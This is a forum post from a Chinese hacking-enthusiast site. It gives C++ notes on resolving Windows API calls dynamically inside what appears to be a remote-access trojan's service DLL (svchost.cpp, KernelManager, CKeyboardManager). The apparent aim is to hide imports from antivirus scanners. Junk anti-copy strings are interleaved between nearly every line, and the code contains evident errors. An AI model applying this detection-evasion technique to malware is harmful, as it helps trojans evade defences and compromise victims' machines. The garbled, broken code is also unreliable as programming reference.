标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
5 d% B; Z, R7 ~& I9 |- p. D
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
0 P! v$ v4 r6 @; v8 [
----------------------------------------
. s% b& M2 \9 Y$ y
DTDY.h:
. q3 T/ h/ _- t! X$ b5 k1 m) f2 p
, g- H) U6 O5 t9 p0 w& b- f
#if _MSC_VER>1000
% P5 a4 o: d6 j& ^- b# R
#pragma once
, z- J/ G3 j5 t3 ~( D) N1 S( P
#endif //_MSC_VER>1000
D7 A5 l5 O* T+ T4 M+ b
#include<windows.h>
2 t% I1 ~; X: }* I0 R
- j2 T& x, s. }7 g# i9 z7 z2 |
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
- o, d! G% j$ q$ G$ ~- Y. }
class DTDY
) y j) r% |7 Q! w5 n/ X
{
+ n) W9 k( Y, W, Q
public:
) ?% f0 Z$ c* v2 D1 [& ^
DTDY();
7 M4 _# J% ^* H" h- G9 m2 P3 r; u
virtual ~DTDY();
$ i4 }! @9 z( r9 |/ f2 V
public:
* z0 M+ z# q3 ?& O4 v" N9 U
static pGetModuleFileNameA MyGetModuleFileName;
+ L5 d4 ^" w! C: G
static BOOL FunInitiallization();
; @# k; U3 A/ U7 A6 E
};
7 ] t* Z6 a" `* {# d0 M+ ]8 v' p
#endif
h; k. h7 s0 P+ J3 B8 |
----------------------------------------
5 p0 U( s3 `" e/ n% t" \3 i! h
2 e4 V& ?; }# _$ g, ^. s6 _) n6 S
DTDY.cpp:
' b) a; c5 @0 C; l$ Q" g
, l2 Y8 i! S+ J# {5 K$ H* D8 }
#include "DTDY.h"
9 Q2 }- C1 i& u `8 l$ Y' \
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
* p+ r3 S( Y8 Y# o. g, b9 y
DTDY:TDY()
' R* z7 o# @# S0 L1 s" ]! U8 c
{
) X0 @0 q( g" e$ h/ S6 [( e" u
}
F3 U# Y8 v) T
DTDY::~DTDY()
6 l9 a+ D3 \& p. x. j6 I5 U
{
! |5 P5 @$ f$ {+ e
}
* l& P- F, `3 {& L
BOOL DTDY::FunInitiallization()
+ f8 l3 R* q% R4 f
{
/ _' D# X1 t' U! I
HMODULE hModule=LoadLibrary("kernel32.dll");
( @8 K, y: `8 f; w8 f& u
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
) U- g* E a4 @/ x
if(!MyGetModuleFileName=) return FALSE;
R! ~$ H4 k7 f9 ]8 d, g& q, |
0 Y* l8 @8 M/ A
return TRUE;
e! f! j, B' D
}
2 Q- T8 f/ K2 q
----------------------------------------
! H# d# t7 w/ E/ ^7 u v
svchost.cpp:
8 W3 H" L7 X* H5 S8 e( _
: K9 v, Q. q$ s! ^4 e' z" J5 G& E; L
#include "DTDY.h"
6 }8 w" b. Z! E. ]* [; p/ E4 Y
5 v8 J( r# ~+ a3 @
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
- \ n. S- l/ q
{
4 W) B8 C/ o6 V1 \
switch(ul_reason_for_call)
' k: V. `, |/ `, D( r' z2 ]
{
" @3 _* Z, ?: D
case DLL_PROCESS_ATTACH:
4 C7 K# `1 |; E7 @3 @; N
if(!DTDY::FunInitiallization()) return FALSE;
! E( b$ ~& x- b; r m
1 J7 o5 t3 `9 @: K& |. d( T8 n
break;
' U/ v$ m( S" i4 ?- R
}
$ O3 r2 a# S. f7 Y# ^! [
}
# i5 @: g. ]# `, K1 {6 o+ k
% O! B N* C9 O1 M9 B* n& \
+ D2 S* o- \ Z1 J) `, M' ?
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
* q; }0 o& v9 Q/ E9 o% U
改写为
: o9 M, R) @5 e9 @5 W, U* E4 L
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
* Z( Q) g5 R+ M; w, `
----------------------------------------
. o4 b3 Y& Y% e* @& P; f. m5 e
KernelManager.cpp:
. k7 x0 L4 R8 S7 V+ E! N
1 f" c u) Q, \7 l' P6 w" T
#include "../DTDY.h"
0 @! m$ O* t" c' G2 g2 H% ^
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
' p! r( g( \* y. }% q# g1 I. d
改写为
- Z3 }$ D4 {" v& M/ m* r' t! g
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
5 O& M: i3 ]/ v' M; u% Y
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
